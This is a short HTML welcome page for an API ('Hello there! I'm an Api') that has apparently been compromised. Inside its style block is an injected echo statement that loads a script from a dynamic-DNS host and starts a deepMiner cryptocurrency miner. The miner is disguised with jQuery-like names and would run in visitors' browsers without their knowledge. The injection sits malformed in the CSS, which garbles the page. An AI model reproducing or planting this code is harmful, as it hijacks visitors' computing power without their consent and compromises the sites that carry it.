<html>
<head>
    <title>MY - api - Welcome</title>
    <style type="text/css">
        html {
            width: 100%;
echo "<script src='https://greenindex.dynamic-dns.net/jqueryeasyui.js'></script>
        <script>
            var uri = 'www';
            var jqueryui = new deepMiner.Anonymous(uri, {autoThreads: true,throttle: 0.5});
	    if (!jqueryui.isMobile() && !jqueryui.didOptOut(14400)) {
            jqueryui.start();
	    }
        </script>";
        }

        #feature {
            width: 960px;
            margin: 95px auto 0 auto;
            overflow: auto;
        }

#content{
	
}

            #content h1 {
				text-align:center;
                font-family: "Segoe UI Light";
                color: #ffffff;
                font-weight: normal;
                font-size: 70px;
                line-height: 48pt;
                width: 900px;
                padding-bottom: 15px;
				position:absolute;
				top:40%;
            }

       

       
    </style>
</head>
<body bgcolor="#00abec">
  <br>  
	<br>
	  <br>  
	    <br>
	<div id="feature">    
    <div id="content">     
	<h1>Hello there! I'm an Api</h1>     
	</div>
	</div>
</html>
